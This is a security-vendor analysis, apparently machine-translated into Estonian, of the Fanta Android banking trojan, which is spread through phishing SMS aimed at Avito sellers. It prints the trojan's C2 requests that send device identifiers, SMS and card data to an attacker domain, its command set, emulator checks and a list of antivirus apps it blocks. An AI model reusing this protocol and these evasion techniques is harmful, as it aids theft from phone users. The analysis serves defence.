Vood on, Fanta: vana Androidi trooja uus taktika

Vood on, Fanta: vana Androidi trooja uus taktika

Kordagi soovite midagi Avitos müüa ja postitate oma toote (näiteks mälumooduli) kohta üksikasjaliku kirjelduse, saate sellise teadete:

Vood on, Fanta: vana Androidi trooja uus taktikaLingile avades näete pigem kahjutuna näiv leht, mis teavitab teid, õnnelikku ja eduka müüjat, ostu sooritamisest:

Vood on, Fanta: vana Androidi trooja uus taktika
Pärast nupu 'Jätka' vajutamist laaditakse teie Android-seadmest APK-fail, mille ikoon ja nimi inspireerivad usaldust. Olete installinud rakenduse, mis mingil põhjusel küsib AccessibilityService õigusi, seejärel ilmuvad ja kiiresti kaovad mõned aknad ja... kõik.

Sisenete oma saldot kontrollima, kuid teie pangarakendus küsib kummaliselt taas teie kaarditeavet. Pärast andmete sisestamist juhtub hirmutav asi: mingi teile veel arusaamatul põhjusel hakkavad raha teie kontolt kaduma. Proovite probleemi lahendada, kuid teie telefon vastupanu osutab: vajutab ise nuppudele 'Tagasi' ja 'Avaleht', ei lülitu välja ja ei võimalda aktiveerida ühtegi kaitsemeetodit. Lõpuks jääte ilma rahata, teie toodet ei osteta, olete segaduses ja küsite: mis juhtus?

Vastus on lihtne: olete saanud Androidi trooja Fanta, Flexneti perekonna ohvriks. Kuidas see juhtus? Selgitame praegu.

Autorid: Andrei Polovinkin, noorem kahjuritarkvara analüütik, Ivan Pisarjev, kahjuritarkvara analüütik.

Natuke statistikat

Esmakordselt sai Flexneti perest Androidi troojad teada juba 2015. aastal. Aja jooksul on see perekond laienenud mitme alaliigi võrra: Fanta, Limebot, Lipton jne. Trooja ja sellega seotud infrastruktuur ei seisa paigal: arendatakse välja uusi tõhusamaid levitusmeetodeid - meie puhul kvaliteetsed ja sihitud phishing-lehed müüjatele, samal ajal kui trooja arendajad järgivad viiruse kirjutamise moodi suundi - lisatakse uusi funktsioone, mis võimaldavad tõhusamalt raha varastada nakatunud seadmetelt ja ületada kaitsemehhanisme.

Käesolevas artiklis kirjeldatud kampaania on suunatud kasutajatele Venemalt, väiksem arv nakatunud seadmeid on registreeritud Ukrainas, veel vähem - Kazahstanis ja Valgevenes.

Kuigi Flexnet on Androidi troojanide seas olnud juba üle 4 aasta ja paljusid teadlasi on see põhjalikult uuritud, on see endiselt heas seisukorras. Alates 2019. aasta jaanuarist on potentsiaalne kahju ületanud 35 miljonit rubla — ja see on ainult Venemaa kampaaniate puhul. Aastal 2015 müüdi erinevaid versioone sellest Androidi troojanist underground foorumites ning seal oli saadaval ka troojani lähtekood koos üksikasjalike kirjeldustega. See tähendab, et kahju statistika maailmas on veelgi muljetavaldavam. Ei ole paha näitaja nii vana programmi jaoks, eks ole?

Vood on, Fanta: vana Androidi trooja uus taktika

Müügist pettuseni

Kuna eelmisel ekraanipildil esitatud Phishimise lehe näide internetiteenuse jaoks kuulutuste postitamiseks Avito on valmistatud konkreetse ohvri jaoks. Tundub, et kurjategijad kasutavad ühte Avito parseritest, mis toob välja müüja telefoninumbri ja nime ning toote kirjelduse. Pärast lehe avamist ja APK-faili ettevalmistamist saadetakse ohvrile SMS-sõnum koos tema nime ja lingiga Phishimise lehele, mis sisaldab tema toote kirjelduse ja „müügi” summa. Kui kasutaja vajutab nuppu, saab ta kahjuliku APK-faili — Fanta.

Domeeni shcet491[.]ru uurimine näitas, et see on delegeeritud ettevõtte Hostinger DNS-serveritele:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Domeeni tsoonifail sisaldab kirjeid, mis osutavad IP-aadressid 31.220.23[.]236, 31.220.23[.]243 ja 31.220.23[.]235. Kuid domeeni peamine ressursikirje (A-kirje) osutab serverile IP-aadressiga 178.132.1[.]240.

IP-aadress 178.132.1[.]240 asub Hollandis ja kuulub hostijale WorldStream. IP-aadressid 31.220.23[.]235, 31.220.23[.]236 ja 31.220.23[.]243 asuvad Suurbritannias ja kuuluvad HOSTINGERi virtuaalhostimise serverile. Registrarina kasutatakse openprov-ru. IP-aadressil 178.132.1[.]240 lahendatakse ka domeenid:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Tuleb märkida, et peaaegu kõikidelt domeenidelt olid ligipääsetavad lingid järgmises formaadis:

http://(www.){0,1}/[0-9]{7}

Sellele šabloonile sobib ka link SMS-sõnumist. Ajalooliste andmete põhjal on leitud, et ühele domeenile vastab mitu linki ülaltoodud šablooni alusel, mis viitab sellele, et üks domeen on troojani levitamiseks kasutatud mitme ohvri jaoks.

Nüüd läheme kiirelt edasi: juhte serverina kasutab SMS-i kaudu lingitud troojan aadressi onuseseddohap[.]club. See domeen registreeriti 12. märtsil 2019, ja alates 29. aprillist 2019 toimus interaktsioon APK-rakenduste ja selle domeeni vahel. Tuginedes VirusTotal'i andmetele, suheldi selle serveriga kokku 109 rakendusega. Domeen resolveerus IP-aadressile 217.23.14[.]27, mis asub Hollandis ja kuulub hostile WorldStream. Registerina kasutatakse namecheap. Sellele IP-aadressile resolveerusid ka domeenid bad-racoon[.]club (alates 25. septembrist 2018) ja bad-racoon[.]live (alates 25. oktoobrist 2018). Domeeniga bad-racoon[.]club suheldi üle 80 APK-failiga, ja bad-racoon[.]live üle 100.

Üldiselt näeb rünnak välja järgmine:

Vood on, Fanta: vana Androidi trooja uus taktika

Mis peitub Fanta all?

Nagu paljusid teisi Androidi troojaneid, suudab Fanta lugeda ja saata SMS-sõnumeid, teha USSD-päringuid ja kuvada oma aknaid rakenduste (sealhulgas pangarakenduste) peal. Kuid selle funktsioonide arsenalis on midagi uut: Fanta hakkas kasutama AccessibilityService eri eesmärkidel: teiste rakenduste teadete sisu lugemine, rünnaku avastamise ja troojani tegevuse peatamise takistamine ning nii edasi. Fanta töötab kõigil Androidi versioonidel alates 4.4. Selles artiklis vaatame lähemalt järgmist Fanta näidist:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Otse pärast käivitamist

Kohe pärast käivitamist peidab troojan oma ikooni. Rakenduse töö on võimalik ainult siis, kui nakatatud seadme nimi ei ole nimekirjas:

  • android_x86
  • VirtualBox
  • Nexus 5X(bullhead)
  • Nexus 5(razor)

Seda kontrolli teostatakse troojani põhiteenuses — MainService. Esmakordsel käivitamisel käivituvad rakenduse konfiguratsiooniparameetrite vaikeseaded (konfiguratsiooniandmete salvestamise vormist ja nende tähendusest räägitakse hiljem), samuti registreeritakse uus nakatatud seade juhte serveris. Serverisse saadetakse HTTP POST-päring sõnumitüübiga register_bot ja teabega nakatatud seadme kohta (Androidi versioon, IMEI, telefoninumber, operaatori nimi ja riigi kood, kus operaator registreeritud on). Juhte serverina toimib aadress hXXp://onuseseddohap[.]club/controller.php. Server vastab sõnum, mis sisaldab välju bot_id, bot_pwd, server — need väärtused rakendus salvestab CnC-serveri parameetritena. Parameeter server on valikuline, kui välja ei saadud: Fanta kasutab registreerimise aadressi — hXXp://onuseseddohap[.]club/controller.php. CnC-aadressi muutmise funktsioon võib olla kasulik kahe ülesande täitmiseks: koormuse ühtlane jaotamine mitme serveri vahel (suure hulga nakatunud seadmete puhul võib koormus optimeerimata veebiserverile olla kõrge) ja ka alternatiivse serveri kasutamiseks ühe CnC-serveri tõrke korral.

Kui päringu saatmise ajal ilmnes tõrge, kordab troojalane registreerimisprotsessi 20 sekundi pärast.

Pärast seadme Fanta edukat registreerimist saadab ta kasutajale järgmise sõnumi:

Vood on, Fanta: vana Androidi trooja uus taktika
Oluline märk: teenus nimega Süsteemi turvalisus — troojalase teenuse nimi, ja pärast nupu vajutamist OK avatakse aken nakatunud seadme Accessibility-seadete jaoks, kus kasutaja peab ise andma Accessibility-õigused pahaente teenusele:

Vood on, Fanta: vana Androidi trooja uus taktika
Niipea kui kasutaja lubab AccessibilityService, Fanta saab juurdepääsu rakenduste akende sisule ja nende sees toimuvatele tegevustele:

Vood on, Fanta: vana Androidi trooja uus taktika
Kohe pärast Accessibility-õiguste saamist küsib troojalane administraatori õigusi ja teavituste lugemise õigusi:

Vood on, Fanta: vana Androidi trooja uus taktika
AccessibilityService'i kaudu imiteerib rakendus klahvivajutusi, andes seeläbi endale vajalikud õigused.

Fanta loob mitu andmebaasi eksemplari (millest räägitakse hiljem), mis on vajalikud konfiguratsioonide andmete salvestamiseks ja ka nakatunud seadme teabe kogumiseks. Kogutud teabe saatmiseks loob troojalane korduva ülesande, mis on mõeldud väljade laadimiseks andmebaasist ja käsu saamiseks juhtserverilt. Pöördumise vahe CnC poole määratakse Androidi versiooni põhjal: versiooni 5.1 puhul on vahe 10 sekundit, muul juhul 60 sekundit.

Käskude saamiseks teeb Fanta päringu GetTask juhtserverile. Vastuseks võib CnC saata ühe järgmistest käskudest:

MeeskondKirjeldus
0Saada SMS-sõnum
1Teha telefonikõne või USSD-käsk
2Uuendab parameetrit intervall
3Uuendab parameetrit intercept
6Uuendab parameetrit smsManager
9Alustada SMS-sõnumite kogumist
11Teha telefoni tooteseadete taastamine
12Akna loomise logimise lubamine/keelamine

Fanta kogub ka teateid 70 pangarakenduselt, kiirete maksesüsteemidelt ja elektroonilistelt rahakottidelt ning salvestab need andmebaasi.

Konfiguratsiooniparametrite salvestamine

Fanta kasutab konfiguratsiooniparametrite salvestamiseks Androidi platvormi standardset lähenemist — Preferences-failid. Seaded salvestatakse faili nimega settings. Salvestatud parameetrite kirjeldus on allolevas tabelis.

NameVaikimisi väärtusVõimalikud väärtusedKirjeldus
id0IntegerBoti identifikaator
serverhXXp://onuseseddohap[.]club/URLKontrollserveri aadress
pwdStringServeri parool
intervall20IntegerAjaintervall. Näitab, kui kaua tuleks järgmiste ülesannete täitmist edasi lükata:
  • SMS-sõnumi saatmisoleku pärimise korral
  • Uue käsu saamine kontrollserverilt

interceptallall/telNumberKui väli võrdub stringiga all või telNumber, siis saadud SMS-sõnum jääb rakendusesse ja ei kuvata kasutajale
smsManager00/1Rakenduse lubamine/keelamine vaikeseadmete SMS-ide saamiseks
readDialogfalseTrue/falseSündmuste logimise lubamine/keelamine AccessibilityEvent

Fanta kasutab ka faili smsManager:

NameVaikimisi väärtusVõimalikud väärtusedKirjeldus
pckgStringKasutatava SMS-ide halduriprogrammi nimi

Andmebaasidega suhtlemine

Oma töös kasutab trooja kahte andmebaasi. Andmebaasi nimega a kasutatakse erineva teabe salvestamiseks, mis on kogutud telefonist. Teine andmebaas kannab nime fanta.db ja salvestab seaded, mis vastutavad fiškikate loomise eest, et koguda teavet pangakaartide kohta.

Troja kasutab andmebaasi üle kogutud teabe ja oma toimingute logimise jaoks. Andmed salvestatakse tabelisse logs. Tabeli loomiseks kasutatakse järgmist SQL-päringut:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Andmebaasis on järgmine teave:

1. Nakatunud seadme aktiveerimise logimine sõnumiga Telefon käivitati!

2. Rakendustelt saadud teated. Sõnum moodustatakse järgmise maldi järgi:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Pangakaarditeave trooa loodud fiškikate vormidest. Parameeter VIEW_NAME võib olla üks järgmistest:

  • AliExpress
  • Avito
  • Google Play
  • Mitmesugune <%App Name%>

Sõnum logitakse vormingus:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Sissetulevad/väljuvad SMS-sõnumid vormingus:

([<g vormingus HH:mm:ss dd.MM.yyyy%>] Tüüp: Sissetulev/Väljuv) <%Mobiiltelefoni number%>:<%SMS-teksti%>

5. Infot paketist, mis loob dialoogakna vormingus:

(<%Paketi nimi%>)<%Paketi info%>

Näide tabelist logs:

Vood on, Fanta: vana Androidi trooja uus taktika
Üks Fanta funktsionaalsustest on teabe kogumine pangakaartide kohta. Andmete kogumine toimub phishing-akende loomisega pangarakenduste avamisel. Trooja loomine loob phishing-akna ainult üks kord. Teave selle kohta, et aken on kasutajale kuvatud, salvestatakse tabelisse settings andmebaasis fanta.db. Andmebaasi loomisel kasutatakse järgmist SQL-päringut:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Kõik tabeli väljad settings algusväärtuseks on 1 (luua phishing-akna). Pärast seda, kui kasutaja on oma andmed sisestanud, muudetakse väärtus 0-ks. Näide tabeli väljadest settings:

  • can_login — väli vastutab vormi kuvamise eest pangarakenduse avamisel
  • first_bank — ei kasutata
  • can_avito — väli vastutab vormi kuvamise eest Avito rakenduse avamisel
  • can_ali — väli vastutab vormi kuvamise eest Aliexpress rakenduse avamisel
  • can_another — väli vastutab vormi kuvamise eest ükskõik millise loendis oleva rakenduse avamisel: Yula, Pandao, Drom Auto, Rahakott. Soodustuse ja boonuste kaardid, Aviasales, Booking, Trivago
  • can_card — väli vastutab vormi kuvamise eest avamisel Google Play

Koostoime juhtserveriga

Võrgukoostoime juhtserveriga toimub HTTP-protokolli kaudu. Fanta kasutab võrgu jaoks populaarses teegis Retrofit. Päringud saadetakse aadressile hXXp://onuseseddohap[.]club/controller.php. Serveri aadressi võib muuta serverisse registreerimisel. Serverilt võivad tulla küpsised. Fanta saadab serverisse järgmised päringud:

  • Boti registreerimine juhtserveris toimub ainult üks kord esimese käivitamise ajal. Serverisse saadetakse järgmised andmed nakatunud seadme kohta:
    · Küpsised — serverilt saadud küpsised (algväärtus — tühi string)
    · režiim — stringi konstant register_bot
    · prefix — täisarvu konstant 2
    · version_sdk — moodustatakse järgmise malli järgi: <%Build.MODEL%>\/<%Build.VERSION.RELEASE%>(Avit)
    · imei — nakatunud seadme IMEI
    · country — riigi kood, kus operaator on registreeritud, ISO formaadis
    · number — telefoninumber
    · operaator — operaatori nimi

    Näide päringust, mis saadetakse serverile:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
    

    Server peab vastama päringule JSON-objektiga, mis sisaldab järgmisi parameetreid:
    · bot_id — nakatunud seadme identifikaator. Kui bot_id on 0, kordab Fanta päringut.
    · bot_pwd — parool serverile.
    · server — juhtserveri aadress. Valikuline parameeter. Kui parameetrit ei ole, kasutatakse rakenduses salvestatud aadressi.

    Näide JSON-objektist:

    {
        "response":[
       	 {
       		 "bot_id": <%BOT_ID%>,
       		 "bot_pwd": <%BOT_PWD%>,
       		 "server": <%SERVER%>
       	 }
        ],
        "status":"ok"
    }

  • Päring käsu saamiseks serverilt. Serverile saadetakse järgmised andmed:
    · Küpsised — serverilt saadud küpsised
    · bid — nakatunud seadme ID, mis saadi päringu saatmisel register_bot
    · pwd — parool serverile
    · divice_admin — väli määrab, kas administraatori õigused on saadud. Kui õigused on saadud, on väli võrdne 1, muidu 0
    · Accessibility — Accessibility Service'i töö staatuse. Kui teenus on käivitatud, on väärtus 1, muidu 0
    · SMSManager — näitab, kas trooja on vaikimisi rakendus SMS-ide saamiseks
    · screen — näitab, millises seisundis ekraan on. Väärtus määratakse 1, kui ekraan on sisse lülitatud, muidu 0;

    Näide päringust, mis saadetakse serverile:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Sõltuvalt käsust võib server tagastada JSON-objekti erinevate parameetritega:

    · Meeskond Saada SMS-sõnum: Parameetrites on telefoninumber, SMS- sõnumi tekst ja saadetava sõnumi identifikaator. Identifikaatorit kasutatakse sõnumi serverisse saatmiseks tüübiga setSmsStatus.

    {
        "response":
        [
       	 {
       		 "mode": 0,
       		 "sms_number": <%SMS_NUMBER%>,
       		 "sms_text": <%SMS_TEXT%>,
       		 "sms_id": %SMS_ID%
       	 }
        ],
        "status":"ok"
    }

    · Meeskond Teha telefonikõne või USSD-käsk: Telefoninumber või käsk saadetakse vastuse kehas.

    {
        "response":
        [
       	 {
       		 "mode": 1,
       		 "command": <%TEL_NUMBER%>
       	 }
        ],
        "status":"ok"
    }

    · Meeskond Muutke parameetrit interval.

    {
        "response":
        [
       	 {
       		 "mode": 2,
       		 "interval": <%SECONDS%>
       	 }
        ],
        "status":"ok"
    }

    · Meeskond Muutke parameetrit intercept.

    {
        "response":
        [
       	 {
       		 "mode": 3,
       		 "intercept": "all"/"telNumber"/
       	 }
        ],
        "status":"ok"
    }

    · Meeskond Muuda SmsManager väli.

    {
        "response":
        [
       	 {
       		 "mode": 6,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

    · Meeskond Kogu SMS-sõnumid nakatunud seadmest.

    {
        "response":
        [
       	 {
       		 "mode": 9
       	 }
        ],
        "status":"ok"
    }

    · Meeskond Teha telefoni tooteseadete taastamine:

    {
        "response":
        [
       	 {
       		 "mode": 11
       	 }
        ],
        "status":"ok"
    }

    · Meeskond Muuda ReadDialog parameetrit.

    {
        "response":
        [
       	 {
       		 "mode": 12,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

  • Sõnumi saatmine tüübiga setSmsStatus. See päring toimub pärast käsu täitmist Saada SMS-sõnum. Päring näeb välja järgmiselt:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=&status_sms=

  • Andmebaasi sisu saatmine. Ühe päringuga saadetakse üks rida. Serverile saadetavad andmed on järgmised:
    · Küpsised — serverilt saadud küpsised
    · režiim — stringi konstant setSaveInboxSms
    · bid — nakatunud seadme ID, mis saadi päringu saatmisel register_bot
    · ntext — tekst praeguses andmebaasi kirjes (väli d tabelist logs andmebaasis üle)
    · number — praeguse andmebaasi kirje nimetus (väli p tabelist logs andmebaasis üle)
    · sms_mode — täisarv (väli m tabelist logs andmebaasis üle)

    Päring näeb välja järgmiselt:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=&text=&number=&sms_mode=

    Eduka saatmise korral serverisse eemaldatakse rida tabelist. Näide JSON-objektist, mille server tagastab:

    {
        "response":[],
        "status":"ok"
    }

Koostöö AccessibilityService'iga

AccessibilityService on rakendatud, et hõlbustada Android-seadmete kasutamist erivajadustega inimestele. Enamikul juhtudel on rakendusega suhtlemiseks vajalik füüsiline sekkumine. AccessibilityService võimaldab seda teha programmeeritult. Fanta kasutab teenust valeakenite loomiseks pankade rakendustes ja takistab süsteemi seadete ja teatud rakenduste avamist.

Kasutades AccessibilityService'i funktsioone, jälgib troojal muutusi nakatunud seadme ekraanil. Nagu eelnevalt mainitud, sisaldab Fanta seadetes parameetrit, mis vastutab dialoogide operatsioonide logimise eest — readDialog. Kui see parameeter on seadistatud, lisatakse andmebaasi teave sündmust algatanud paketi nime ja kirjelduse kohta. Troojan täidab järgmisi toiminguid sündmuste aktiveerimisel:

  • Simuleerib tagasi ja kodu nuppude vajutamist juhul:
    · kui kasutaja soovib oma seadet taaskäivitada
    · kui kasutaja soovib rakendust “Avito” kustutada või juurdepääsuõigusi muuta
    · kui lehel on viide rakendusele “Avito”
    · kui avatakse rakendus “Google Play Protect”
    · kui avatakse lehed AccessibilityService seadistustega
    · kui ilmneb dialoogitudeng “Süsteemi turve”
    · kui avatakse leht “Draw over other app” seadistustega
    · kui avatakse leht “Rakendused”, “Taastamine ja lähtestamine”, “Andmete lähtestamine”, “Seadete lähtestamine”, “Arendaja paneel”, “Erivõimalused”, “Erilised õigused”
    · kui sündmus genereeriti teatud rakenduste poolt.

    Rakenduste nimekiri

    • android
    • Master Lite
    • Clean Master
    • Clean Master for x86 CPU
    • Meizu rakenduse õiguste haldamine
    • MIUI Security
    • Clean Master — Antiviirus & Vahemälu ja prügi puhastus
    • Vanemliku kontrolli ja GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Veebiturbe beetaversioon
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobiilne Antiviirus Security PRO
    • Avast antiviirus & tasuta kaitse 2019
    • Mobiilne turvalisus MegaFon
    • AVG Protection Xperia jaoks
    • Mobiiline turvalisus
    • Malwarebytes antiviirus & kaitse
    • Antiviirus Androidile 2019
    • Security Master — Antiviirus, VPN, AppLock, Booster
    • AVG antiviirus Huawei tahvelarvuti süsteemihalduri jaoks
    • Samsung Accessibility
    • Samsung Smart Manager
    • Security Master
    • Speed Booster
    • Dr.Web
    • Dr.Web Security Space
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antiviirus & Mobiilne turvalisus
    • Kaspersky Internet Security: Antiviirus ja Kaitse
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security — kaitse ja haldus
    • AVG Antiviirus tasuta 2019 – Kaitse Androidile
    • Antiviirus Androidile
    • Norton Mobile Security and Antivirus
    • Antiviirus, tulemüür, VPN, mobiilne turvalisus
    • Mobiilne turvalisus: antiviirus, VPN, varguse kaitse
    • Antiviirus Androidile

  • Kui SMS-i saatmisel lühinumbrile küsitakse luba, imiteerib Fanta checkbox'i vajutamist Salvesta valik ja nuppu saata.
  • Kui troojal üritab administreerimisõigusi tühistada, blokeerib see telefoni ekraani.
  • Tõkestab uute administraatorite lisamise.
  • Kui antiviirusrakendus dr.web tuvas ohu, imiteerib Fanta nuppu ignoreeri.
  • Troojal imiteerib nuppu tagasi ja koju, kui sündmus genereeriti rakenduse Samsung Device Care.
  • Fanta loob püügivõrgud, mis sisaldavad pangakaardiandmete sisestamise vorme, kui see on avatud rakendusest, mis on loendis, kuhu kuulub kuskil 30 erinevat veebiteenust. Nende hulka kuuluvad: AliExpress, Booking, Avito, Google Play Marketi komponent, Pandao, Drom Auto jne.

    Kalastamise vormid

    Fanta analüüsib, milliseid rakendusi käitatakse nakatatud seadmes. Kui on avatud huvipakkuv rakendus, kuvab trooja kõikide teiste kohal püügivõrgu, milleks on pangakaardiandmete sisestamise vorm. Kasutajal tuleb sisestada järgmised andmed:

    • Kaardi number
    • Kaardi kehtivusaeg
    • CVV
    • Kaardi omaniku nimi (mitte kõigi pankade jaoks)

    Sõltuvalt avatud rakendusest kuvatakse erinevad püügivõrgud. Järgnevalt tuuakse välja mõningate näidete näited:

    Aliexpress:

    Vood on, Fanta: vana Androidi trooja uus taktika
    Avito:

    Vood on, Fanta: vana Androidi trooja uus taktika
    Mõnede teiste rakenduste jaoks, näiteks Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Vood on, Fanta: vana Androidi trooja uus taktika

    Kuidas tegelikult kõik oli

    Õnneks oli inimene, kes sai alguses mainitud SMS-sõnumi, küberjulgeoleku spetsialist. Seetõttu erineb reaalne, mitte lavastatud versioon varem kirjeldatust: inimene sai huvitava SMS-i, mille ta andis Group-IB Threat Hunting Intelligence meeskonnale. Rünnaku tulemus — see artikkel. Õnnelik lõpp, eks? Siiski ei lõppe kaugel kõik lood nii õnnelikult, ja et sinu oma ei meenutaks lavastatud versiooni rahade kaotamisega, piisab enamasti järgida järgmisi, juba ammu kirjeldatud reegleid:

    • ärge installige Android-operatsioonisüsteemiga mobiilirakendusi ühtegi allikast välja arvatud Google Play
    • rakenduse installimisel pöörake erilist tähelepanu rakenduse küsitavatele õigustele
    • pöörake tähelepanu allalaaditavate failide laiendustele
    • uuendage regulaarselt Androidi operatsioonisüsteemi
    • ärge külastage kahtlaseid ressursse ja ärge allalagage sealt faile
    • ärge klõpsake SMS-sõnumites saadud linkidel.

Allikas: habr.com

Osta usaldusväärne hostimine veebilehtede jaoks DDoS-i kaitsega, VPS VDS serverid 🔥 Osta usaldusväärne hostimine veebilehtede jaoks DDoS-i kaitsega, VPS VDS serverid | ProHoster